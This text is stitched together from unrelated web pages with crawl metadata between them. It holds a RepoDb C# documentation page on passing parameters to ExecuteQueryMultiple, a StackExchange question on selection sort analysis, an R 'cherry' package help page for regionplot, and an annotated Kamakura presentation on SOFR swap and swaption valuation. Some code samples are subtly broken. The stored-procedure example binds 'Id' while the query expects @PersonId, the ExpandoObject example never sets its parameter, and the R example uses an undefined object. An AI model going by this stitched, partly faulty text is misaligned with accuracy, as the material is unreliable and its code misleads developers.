Parameters\n\nYou can pass a parameter via the following objects.\n\n• IDbDataParameter\n• Anonymous Types\n• ExpandoObject\n• Dictionary<string, object>\n• QueryField/QueryGroup\n\n## IDbDataParameter\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nusing (var result = connection.ExecuteQueryMultiple(\"SELECT * FROM [dbo].[Person] WHERE [Id] = @PersonId; SELECT * FROM [dbo].[Address] WHERE PersonId = @PersonId;\", new { PersonId = new SqlParameter(\"_\", 10045) }))\n{\n// Do more stuffs here\n}\n}\n``````\n\nThe name of the parameter is not required. The library is replacing it with the actual name of the property passed from the object.\n\n## Anonymous Types\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nusing (var result = connection.ExecuteQueryMultiple(\"SELECT * FROM [dbo].[Person] WHERE [Id] = @PersonId; SELECT * FROM [dbo].[Address] WHERE PersonId = @PersonId;\", new { PersonId = 10045 }))\n{\n// Do more stuffs here\n}\n}\n``````\n\n## ExpandoObject\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nvar param = new ExpandoObject() as IDictionary<string, object>;\nusing (var result = connection.ExecuteQueryMultiple(\"SELECT * FROM [dbo].[Person] WHERE [Id] = @PersonId; SELECT * FROM [dbo].[Address] WHERE PersonId = @PersonId;\", param))\n{\n// Do more stuffs here\n}\n}\n``````\n\n## Dictionary<string, object>\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nvar param = new Dictionary<string, object>\n{\n{ \"PersonId\", 10045 }\n};\nusing (var result = connection.ExecuteQueryMultiple(\"SELECT * FROM [dbo].[Person] WHERE [Id] = @PersonId; SELECT * FROM [dbo].[Address] WHERE PersonId = @PersonId;\", param))\n{\n// Do more stuffs here\n}\n}\n``````\n\n## QueryField/QueryGroup\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nvar param = new []\n{\nnew QueryField(\"PersonId\", 10045)\n};\nusing (var result = connection.ExecuteQueryMultiple(\"SELECT * FROM [dbo].[Person] WHERE [Id] = @PersonId; SELECT * FROM [dbo].[Address] WHERE PersonId = @PersonId;\", param))\n{\n// Do more stuffs here\n}\n}\n``````\n\nOr via QueryGroup.\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nvar param = new QueryGroup(new []\n{\nnew QueryField(\"PersonId\", 10045)\n});\nusing (var result = connection.ExecuteQueryMultiple(\"SELECT * FROM [dbo].[Person] WHERE [Id] = @PersonId; SELECT * FROM [dbo].[Address] WHERE PersonId = @PersonId;\", param))\n{\n// Do more stuffs here\n}\n}\n``````\n\n## Array Parameters (for the IN keyword)\n\nYou can pass an array of values if you are using the `IN` keyword.\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nvar param = new\n{\nKeys = new [] { 10045, 10102, 11004 }\n};\nusing (var result = connection.ExecuteQueryMultiple(\"SELECT * FROM [dbo].[Person] WHERE [Id] IN (@Keys); SELECT * FROM [dbo].[Address] WHERE PersonId IN (@Keys);\", param))\n{\n// Do more stuffs here\n}\n}\n``````\n\nYou can also use the types defined at the Passing of Parameters section when passing a parameter.\n\n## Executing a Stored Procedure\n\nThe calls to execute a stored procedure is by simply calling the `EXEC` command of the SQL Server. It can be combined together with other raw-SQL statements.\n\n``````using (var connection = new SqlConnection(connectionString))\n{\nusing (var result = connection.ExecuteQueryMultiple(\"EXEC [dbo].[sp_GetPerson](@PersonId); SELECT * FROM [dbo].[Address] WHERE PersonId = @PersonId;\", new { Id = 10045 }))\n{\n// Do more stuffs here\n}\n}\n``````" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5459585,"math_prob":0.91939765,"size":4712,"snap":"2023-14-2023-23","text_gpt3_token_len":1129,"char_repetition_ratio":0.20433305,"word_repetition_ratio":0.44528875,"special_character_ratio":0.27419356,"punctuation_ratio":0.14950635,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97666866,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-08T01:50:52Z\",\"WARC-Record-ID\":\"<urn:uuid:cc545d0a-9a07-4a6d-99c2-7fbab63f2392>\",\"Content-Length\":\"55671\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0a7daa3e-0cfe-48bb-b7a9-be286463371d>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb25d182-8cc6-43fe-86e0-cb718437247c>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://repodb.net/operation/executequerymultiple\",\"WARC-Payload-Digest\":\"sha1:P6GXEZFEFWEPQGLKVM67G32TYZR3DZXM\",\"WARC-Block-Digest\":\"sha1:MJLVVBQVKCD7VXSQWMHS6OSBLIMBXTGI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224654031.92_warc_CC-MAIN-20230608003500-20230608033500-00107.warc.gz\"}"}
https://cs.stackexchange.com/questions/97664/selection-sort-analysis
[ "# Selection Sort Analysis\n\nI'm having difficulty understanding the big-O analysis of the selection sort algorithm. Here is my pseudocode (with line numbers):\n\n procedure SELECTION (A(n), limit)\n1. for j <- 0 to limit - 1 do\n2. min_index <- j\n3. for k <- j + 1 to limit do\n4. if A(k) < A(min_index)\n5. min_index <- k\n6. end-if\n7. end-for\n8. temp <- A(min_index)\n9. A(min_index) <- A(j)\n10. A(j) <- temp\nend-for\nend-SELECTION\n\n\nOur professor wants us to work from the inside out; in other words, analyze the statements the furthest away from the conceptual vertical line that denotes hierarchies. Therefore, I start at line 5, and work out from there. Here's what I've understood so far:\n\n• The time complexity of lines 4-6 is O(1) (constant).\n• Because lines 4-6 are \"contained\" in the for loop on line 3, you must use the rule of sums to multiply line 3 and lines 4-6. In other words, if line 3 is a program fragment f(x) and lines 4-6 are a program fragment g(x), then the time complexity of lines 3 - 6 is f(x) * g(x).\n\nThis is where I get confused. Because var limit is referencing the size of the array, wouldn't the for loop on line 3 run limit-1 times, because k is equal to 1 and is running to limit? To put it another way, if k were equal to zero, wouldn't the loop run limit times? Every video and website I've looked at has not given me a clear representation of that expression, because they've analyzed it differently.\n\nOn top of this question, how do I determine which asymptotic notation to use to describe this problem? Is it Big-Oh, Big-Omega or Big-Theta?\n\nThank you.\n\nThe number of iterations of the loop 3–7 depends on the value of $$j$$: it is $$\\mathit{limit} - j$$. Therefore the running time of lines 3–7 is $$O(\\mathit{limit} - j)$$. Lines 8–10 run in $$O(1)$$ time, so the body of the loop 1–11 runs in time $$O(\\mathit{limit}-j) + O(1) = O(\\mathit{limit}-j)$$ (using $$j < \\mathit{limit}$$). Finally, the total running time is $$O\\left(\\sum_{j=0}^{\\mathit{limit}-1} \\mathit{limit}-j\\right) = O\\left(\\sum_{j=1}^{\\mathit{limit}} j\\right) = O(\\mathit{limit}^2),$$ using the formula $$\\sum_{j=1}^n j = \\frac{n(n+1)}{2}$$." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8869057,"math_prob":0.9964974,"size":1550,"snap":"2020-10-2020-16","text_gpt3_token_len":428,"char_repetition_ratio":0.104786545,"word_repetition_ratio":0.006993007,"special_character_ratio":0.2832258,"punctuation_ratio":0.11764706,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997507,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-04T16:43:54Z\",\"WARC-Record-ID\":\"<urn:uuid:80506a74-8c3f-437c-b3d6-bcb8ac459a59>\",\"Content-Length\":\"143393\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b057c701-8b48-4935-b409-58d0277c92d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:ec081919-6f27-43ad-9eda-6e0e160fc0cc>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://cs.stackexchange.com/questions/97664/selection-sort-analysis\",\"WARC-Payload-Digest\":\"sha1:ENRXYYF4CKLNMREHEL7L2BWI42US2C4I\",\"WARC-Block-Digest\":\"sha1:3W7ESZIFYEWVQEIK4HCNYP6ZHIWTMWQM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370524043.56_warc_CC-MAIN-20200404134723-20200404164723-00432.warc.gz\"}"}
https://search.r-project.org/CRAN/refmans/cherry/html/regionplots.html
[ "Plot region objects {cherry} R Documentation\n\n## Visualizing of the region hypotheses that could be rejected.\n\n### Description\n\nVisualizes region objects as created through a call to regionmethod.\n\n### Usage\n\n regionplot (region, alpha, color=\"red\")\n\nregionplot2 (region, alpha, color_rej=\"red\", color_unrej=\"grey\")\n\n\n### Arguments\n\n region An object of class region, typically created through a call to regionmethod. alpha For region objects with adjusted p-values, specifies the value of alpha for which rejections should be plotted (optional). color Color that is used to indicate rejected region hypotheses. color_rej Color that is used to indicate rejected region hypotheses. color_unrej Color that is used to indicate unrejected region hypotheses.\n\n### Details\n\nBoth plot functions create a graph that visualizes all possible region hypotheses. Each region hypothesis is a node in the graph, and from each region hypothesis two edged connect the hypothesis with its child hypotheses. The regionplot2 function visualized the graph with its nodes and edges. This function is especially useful for region objects with a limited number of elementary hypotheses. The regionplot function does not display the nodes and edges separately, but draws a polygon that follows the original graph structure.\n\n### Author(s)\n\nRosa Meijer: [email protected]\n\n### Examples\n\n\n#generate data, where the response Y is associated with certain groups of covariates\n#namely cov 3-6, 9-12, 15-18\nset.seed(1)\nn=100\np=20\nX <- matrix(rnorm(n*p),n,p)\nbeta <- c(rep(0,2),rep(1,4),rep(0,2),rep(1,4),rep(0,2),rep(1,4),rep(0,2))\nY <- X %*% beta + rnorm(n)\n\n# Define the local test to be used in the closed testing procedure\nmytest <- function(left,right)\n{\nX <- X[,(left:right),drop=FALSE]\nlm.out <- lm(Y ~ X)\nx <- summary(lm.out)\nreturn(pf(x$fstatistic,x$fstatistic,x\\$fstatistic,lower.tail=FALSE))\n}\n\n# perform the region procedure\nsummary(reg)\n\n#what are the smallest regions that are found to be significant?\nimplications(reg)\n\n#how many covariates within the full region of length 20 are at least associated with the response?\nregionpick(reg, list(c(1,p)), alpha=0.05)\n\n#visualize the results by either plotting a polygon corresponding to the underlying graph\nregionplot(reg)\n\n#or by plotting the graph itself\nregionplot2(reg)\n\n\n\n[Package cherry version 0.6-14 Index]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7341512,"math_prob":0.9207999,"size":2165,"snap":"2023-14-2023-23","text_gpt3_token_len":565,"char_repetition_ratio":0.14021286,"word_repetition_ratio":0.05704698,"special_character_ratio":0.2512702,"punctuation_ratio":0.14423077,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9911297,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-26T11:42:19Z\",\"WARC-Record-ID\":\"<urn:uuid:1454c414-6bc5-4bf0-a907-65050c2c5d87>\",\"Content-Length\":\"4819\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:82d9390f-2d3b-4f1a-bf38-8c4ed3a13709>\",\"WARC-Concurrent-To\":\"<urn:uuid:814d343d-2fb2-4370-8fb2-ebefdc336094>\",\"WARC-IP-Address\":\"137.208.57.46\",\"WARC-Target-URI\":\"https://search.r-project.org/CRAN/refmans/cherry/html/regionplots.html\",\"WARC-Payload-Digest\":\"sha1:MKOWY7QEWPPO237YK7GEGJWT5I2MNKSI\",\"WARC-Block-Digest\":\"sha1:3C43DYU5J5NIHLTYZBJTLKTFGCU4XY2Q\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296945472.93_warc_CC-MAIN-20230326111045-20230326141045-00174.warc.gz\"}"}
https://www.kamakuraco.com/2022/05/19/the-reduced-form-approach-to-sofr-swap-and-swaption-valuation/
[ "Select Page", null, "Donald R. Van Deventer, Ph.D.\n\nDon founded Kamakura Corporation in April 1990 and currently serves as its chairman and chief executive officer where he focuses on enterprise wide risk management and modern credit risk technology. His primary financial consulting and research interests involve the practical application of leading edge financial theory to solve critical financial risk management problems. Don was elected to the 50 member RISK Magazine Hall of Fame in 2002 for his work at Kamakura.\n\n# The Reduced Form Approach to SOFR Swap and Swaption Valuation\n\n05/19/2022 11:50 AM\n\nRobert A. Jarrow and Donald R. van Deventer\n\nPresentation  to Risk Americas, May 11, 2022\n\nThis Version: May 19, 2022\n\nAbstract\n\nWe present an annotated version of slides used in a presentation to Risk Americas on the reduced form approach to SOFR swap and swaptions valuation. The same methodology can be used for any floating rate swap index from Libor to Treasury bills and to any new short-term index that may emerge in the years ahead. The contents of the slides were co-authored by Prof. Jarrow and Mr. van Deventer. The annotated comments which follow reflect comments from the podium by Mr. van Deventer or additional remarks that reflect the newer data used in this version and comments from conference participants received after the original presentation.\n\nFrom an academic point of view, Prof. Jarrow often comments that a model based on false assumptions should be rejected.  From a practitioner point of view, a model based on false assumptions cannot be rejected until a more accurate replacement model is available. This presentation is candid in its assessment of models in common use for swaptions valuation and practical in replacing false assumptions with alternatives that fit observable market prices perfectly.\n\nComments and suggestions are welcome at [email protected].\n\nKamakura-ReducedFormValuationSOFRSwaptions20220511", null, "This version of the presentation uses data as of May 13, 2022 instead of the April 22 data discussed on May 11.", null, "The methodology discussed today is not new.  It was developed in the late 1980s by Prof. Jarrow, Andrew Morton, and David Heath.  The academic version of the paper was published in 1992 in Econometrica, the “HJM” approach to term structure modeling.  That approach derives the conditions for no arbitrage (i.e., a perfect fit to market data) for any number of factors and any form of factor volatility.  Because there can be many factors, the word “volatility” by itself has no meaning, unlike current market convention for swaptions valuation.  These recent works provide extensive worked examples (on the left) and a consistent mathematical framework (on the right) for what follows.", null, "Because Prof. Jarrow was unable to be present at the conference, Mr. van Deventer was speaking without his favorite “mathematical bodyguard.”  For that reason, the only math in this presentation consists of addition, subtraction, multiplication and division.", null, "Two irresistible forces collide when it comes to the valuation of swaps and swaptions.  The first group is passionately devoted to Excel spreadsheets and two probability distributions: the normal and lognormal distributions. The second group is the uneasy collaboration between regulators, who have grown weary of corruption by dealers, and the dealers themselves.  SOFR was forced on market participants as the one interest rate that is most difficult to manipulate. The authors belong to neither of these groups, although Mr. van Deventer was a long-time card-carrying member of the Excel/normal group.  He has since moved on to more powerful tools.", null, "From an academic point of view, it is easy to argue that SOFR is the equivalent of a 1-day Treasury rate, but this quote from the Financial Times makes it clear that SOFR is much more than that.", null, "This exchange, after the presentation, explains why SOFR is NOT equivalent to a 1-day Treasury. A repo trader made it clear that there is definitely a credit component embedded in the repo rates from which SOFR is derived by the Federal Reserve Bank of New York. The data which follows confirms this view quite clearly.", null, "In what follows, we use best practice financial economics and the generalization of the Black-Scholes risk-neutral valuation to eliminate a series of false assumptions commonly used to value swaps and swaptions. We highlight those differences in the slides that follow.", null, "On this slide we plot U.S. Treasury par coupon yields, U.S. Treasury zero coupon yields, U.S. Treasury monthly forward rates, and SOFR swap quotes out to 30 years as reported by Bloomberg.  SOFR swap rates, in part due to differences in day count basis, differ significantly from par coupon Treasury yields.  We explain why in the following slides.", null, "Most of the worry about SOFR as an index is the ex-post compounded floating rate payment.  In this table we use daily Treasury yields since January 1962, smoothed to provide discount factors from 1 day to 30 years for every observation date.  Using overlapping time intervals from 7 days to 18 months.  We run a regression of this form:\n\nCompounded SOFR = alpha + beta (time 0 fixed dollar interest on matched maturity fixed rate Treasuries)\n\nNote the “beta” in this equation declines with maturity and that the alpha is usually small.", null, "This graph shows the dispersion (we try to avoid the term “volatility”) of compounded SOFR or 1-day Treasury (depending on SOFR availability) around the fixed dollars of interest on U.S. Treasuries over the full time period.", null, "One of the reasons for the decline in beta on a data set that is mainly 1-day Treasury yields is the term premium embedded in U.S. Treasuries.  This graph, updated weekly on www.kamakuraco.com, shows the difference between the time zero U.S. Treasury zero coupon bond yield curve versus the total return on the compounded return on expected empirical (not risk-neutral) 3-month Treasury bill yields in a 10-factor Heath, Jarrow and Morton simulation of 500,000 scenarios that we explain in later slides. We need to determine whether this is relevant to SOFR swaps and swaptions.", null, "Now we turn to SOFR swaps first and derive what alpha and beta values are implied by observable SOFR swap yields.", null, "To do this, we use the extremely powerful approach of Amin and Jarrow (1992), which shows how to do valuation of any non-defaultable instrument in an environment where the risk-free curve is driven by multiple factors and volatility that can be either random (driven by rate levels, for example) or simply time dependent.  We assume the swap and swaption counterparties are risk-free as Black and Scholes did.  We note that an individual repo counterparty can default, but the SOFR index does not.  For that reason, Amin and Jarrow’s approach is appropriate.", null, "This slide summarizes the differences between best practice financial economics and common practice for swap and swaptions valuation.  The most important difference is that all discounting is based on the risk-free yield curve.  Specifically, a forward-looking simulation is used to generate the daily compounded value of a Treasury “money market fund” that takes on a different value in each scenario at each time step.  Proper procedure does not use a constant discount rate (Black-Scholes did so only because they assumed rates were constant).  Moreover, the relevant yield curve for discounting is NOT the swap “curve” (which is not a yield curve). In this analysis, we derive the swap curve, rather than using it as an input to valuation.", null, "This slide summarizes how the Heath, Jarrow and Morton approach provides a Monte Carlo simulation that perfectly values not only the time-zero U.S. Treasury curve but also perfectly prices future returns for any maturity and any holding period.  Using 120 quarterly yield segments of the May 13, 2022 U.S. Treasury curve, the Monte Carlo simulation is generated such that the risk-neutral expected value of the 120 zero coupon bond prices matches their value exactly. We use this knowledge to derive valuations that apply to all simulations, not just the simulation we performed on May 13.", null, "Using the Amin and Jarrow approach, we know the value of the first fixed dollar payment on a SOFR swap for S dollars in N days is the risk-neutral value of S discounted by the U.S. Treasury daily money fund value in each scenario.  Because S is not correlated with future interest rates, it comes outside of the expectation.  The value is simply S times the zero-coupon Treasury bond that matures on the date S is paid.  The use of the “swap curve” to extract a discount factor is simply as wrong as it is common.", null, "The value of the fixed payments (m in total) on a SOFR swap is just S dollars times the m zero coupon U.S. Treasury zero coupon bonds maturing on the m payment dates.  The only information we use from the swap market is the dollar amount of the fixed payment.  Note that the value of all fixed payments does not equal the notional value of the swap.", null, "Now we use the same approach to value one floating leg of the swap, taking the third floating rate payment as an example.  We know from previous slides that repos have a non-zero default risk and a recovery rate that is not necessarily 100% in the event of default. As a first approximation for this risk above and beyond the one-day Treasury, we assume the compounded SOFR rate paid at the end of period 3 is alpha plus beta times the dollars of interest r that would be paid on a compounded 1-day Treasury rate, plus an error term.  When we recognize that we have a Treasury money market fund component in both the numerator and the denominator and take risk-neutral expectations, magic happens.", null, "Without doing any simulations, risk-neutral valuation gives us an explicit formula for the 3rd floating rate payment that is a function only of alpha, beta, and the U.S. Treasury zero coupon bonds that mature at the end of periods 2 and 3.", null, "This table summarizes the values of the fixed and floating rate payments on SOFR swaps with annual payment dates out to 10 years. IMPORTANT NOTE: When alpha and beta are 0 and 1 respectively (as they would be if we were talking about compounded 1-day Treasuries instead of SOFR), the sum of the floating payment values is simply \\$1 minus the value of a Treasury zero coupon bond that matures on the last swap payment date (this happens because there is no principal exchange on the swap, contrary to common market assumptions).", null, "For notional convenience, we let K be the sum of the Treasury zero coupon bond prices on each payment date.  Vf is the value of the fixed side of the swap.", null, "Ve is the value of the floating side of the swap. The mathematical summary here says the same thing as the table in slide 20.", null, "Using these formulas with no simulation, we can solve for the equilibrium no arbitrage fixed dollar payments on a SOFR swap as a function of alpha and beta in each payment period (we don’t assume that they are constant) and the U.S. Treasury curve.", null, "We can use the observable market prices on SOFR swaps and the related fixed dollar payments Sm to imply beta if alpha is assumed to be the 0.042% historical value from 1962 through April 30, 2022. That leaves us with one unknown (beta) in each period.  We solve for the beta that correctly prices a 1-year SOFR swap.  We then recursively repeat the process, stepping forward one year at a time, until we have beta for the first 10 years of swap pricing.", null, "We do that for May 13 and find that the implied beta values through 18 months are consistently higher than the historical betas for the merged 1-day Treasury and SOFR data base. This is consistent with the repo trader’s description of the credit risk embedded in repo quotations underlying SOFR.", null, "Beyond 10 years, ISDA reports little trading volume. Nonetheless, implied betas can be calculated in many ways, typically using step-wise constant or smoothing generated betas.  This chart shows that, if market quotations beyond 10 years have credibility, market-implied betas move up and down in fairly smooth waves.", null, "With a perfect fit to observable swap prices in hand, we now turn to the valuation of SOFR swaptions.", null, "In what follows, we use a 10-factor Heath, Jarrow and Morton simulation of the U.S. Treasury curve starting on May 13 to value swaptions.  An explanation and downloadable data are available here:\n\nhttps://www.kamakuraco.com/2022/05/16/kamakura-weekly-forecast-may-13-2022-forward-rates-rise-to-4-34/\n\nThe simulations are updated weekly and available on www.kamakuraco.com.", null, "This graph shows the distinction between the risk-neutral (in blue) 1-year Treasury yield five years forward and the empirical (in red) or observable 1-year Treasury expected to prevail at that time.  The difference is relevant to Black-Scholes as well: the “simulated” stock returns in Black-Scholes are the risk-neutral returns, not the actual return distribution that would be observable if one could repeat history N times.\n\nThe use of 10 factors is essential to replicating the actual level of volatility that has appeared across the U.S. Treasury curve throughout the 60-year history in the data set.  If an analyst fit a model to history using only one factor, a separate Kamakura study shows that the simulated dispersion of interest rates would underestimate actual dispersion by 61% to 83%.", null, "Using these simulations, we now have two equations in 2 unknowns at each annual time step from 2 years onward: we have the 2-year SOFR swap rate and the quote for a European swaption with an exercise period of 1 year on a swap with an underlying maturity of 1 year on the exercise date.  We fit alpha and beta so that both the swap and the swaption are priced perfectly.  Ultimately, we do not constrain alpha to be non-negative.", null, "With only a small incremental calculation, we calculate the forward levels of the fixed dollar payment on the underlying 1-year forward swap using the existing Treasury simulation and any equation solver (including Excel) such that the swaption and the 2-year SOFR swap are priced with no error.", null, "If we assume physical delivery of the underlying swap, the positive cash flows on the underlying swap versus the strike dollar payments will come at the end of year 2, so discounting is done using the 500,000 values of the U.S. Treasury money market fund in year 2.  The value of the swaption is the average of the discounted values (roughly half of which will be zero since it will not be rational to exercise the swaption).", null, "This approach can be used on the full matrix of swaption prices, but the authors prefer to use only those maturities for which there is a high confidence that quoted dollar swaption prices are consistent with real traded prices, not a back-office broker model alone.", null, "This graph shows the distribution of the simulated 1-year SOFR swap rate 4 years forward using the best fitting alphas and betas for years 1 through 5.  Exercise is rational when the graph is shaded yellow.  Profits are zero when exercise is irrational, shaded blue.  The distribution is not normal (the black line) for a number of reasons:\n\n• The Treasury simulation uses 10 factors, not 1\n• The Treasury factor volatilities are stochastic, driven by rate levels, not normal\n• The evolution of alpha and beta may in fact be random\n\nThe skewness and kurtosis are given in the notes to the slide.", null, "Black and Scholes assumed interest rates were constant, which is why they appropriately used a constant discount rate for all stock price scenarios.  When valuing interest rate derivatives that only exist because interest rates are random, it is simply wrong to use a constant discount rate instead of the scenario-specific money fund values.  This example shows that the use of a constant discount rate to value a European swaption can result in very serious mispricing.  For a 9-year exercise period on a 1-year underlying swap, the true value of the swaption is 169 basis points, but a model with 1 discount rate at the time zero 10-year US Treasury zero coupon bond yield wildly overestimates swaption value at 197 basis points.  The reduced form model prices the swaption (and the underlying term structure of swap prices) perfectly.", null, "In the next slide we compare the perfectly matched observable market prices for European swaptions on a 1-year underlying SOFR swap with a hypothetical swaption: using the same strike price, we set the alphas to zero and betas to one to price a swaption where the floating rate index is the compounded 1-day Treasury yield, not SOFR.", null, "The cost of the SOFR swaption is usually more than double the price of a swaption using the compounded 1-day Treasury rate.  When it comes to hedging interest rate risk, a SOFR swaption has alpha and beta “parameter risk” in addition to risks stemming from movements in the underlying Treasury curve.", null, "We conclude that a reduced form model for SOFR swaps and swaptions valuation is essential to the transparent understanding of fair value, hedge ratios, and interest rate risk. We welcome comments, questions, and suggestions at [email protected].\n\nFootnotes\n\n Samuel Curtis Johnson Graduate School of Management, Cornell University, Ithaca, N.Y. 14853 and Kamakura Corporation, Honolulu, Hawaii 96815. Email: [email protected]\n\n Kamakura Corporation, Honolulu, Hawaii 96815. Email [email protected]\n\n We apologize that the adjusted r-squared for 546 days is not correct due to inevitable Excel errors.\n\n SOFR data was not reported by the Federal Reserve Bank of New York until April, 2018.\n\n For the first-year alpha and beta, we use the historical alpha and the implied beta derived using the 1-year SOFR swap quote alone.", null, "", null, "" ]
[ null, "https://www.kamakuraco.com/wp-content/uploads/2020/07/donald.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page1.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page2.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page3.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page4.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page5.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page6.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page7.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page8.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page9.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page10.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page11.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page12.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page13.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page14.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page15.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page16.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page17.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page18.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page19.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page20.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page21.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page22.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page23.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page24.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page25.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page26.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page27.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page28.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page29.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page30.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page31.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page32.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page33.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page34.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page35.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page36.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page37.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page38.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2022/05/page39.jpg", null, "https://www.kamakuraco.com/wp-content/uploads/2020/07/donald.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9135971,"math_prob":0.90836346,"size":17071,"snap":"2022-27-2022-33","text_gpt3_token_len":3657,"char_repetition_ratio":0.13763402,"word_repetition_ratio":0.014851485,"special_character_ratio":0.20637338,"punctuation_ratio":0.088772036,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9560459,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82],"im_url_duplicate_count":[null,null,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-04T12:21:22Z\",\"WARC-Record-ID\":\"<urn:uuid:ec0fb0b8-0369-4831-83b2-ea943f917a88>\",\"Content-Length\":\"357806\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ad534408-8cf4-48d0-8c1b-262e1b616b17>\",\"WARC-Concurrent-To\":\"<urn:uuid:13dd136a-ec0d-4622-90f6-98a4b3de1c57>\",\"WARC-IP-Address\":\"69.87.218.155\",\"WARC-Target-URI\":\"https://www.kamakuraco.com/2022/05/19/the-reduced-form-approach-to-sofr-swap-and-swaption-valuation/\",\"WARC-Payload-Digest\":\"sha1:OE64XGB4ONTSNA7ZEUCKMQFDQ7BBPORH\",\"WARC-Block-Digest\":\"sha1:RBEVJRTSXFYQIVHKV4OYU2B4FZAVEWOA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104375714.75_warc_CC-MAIN-20220704111005-20220704141005-00294.warc.gz\"}"}
https://percent-calculation.com/skolko-30-7136
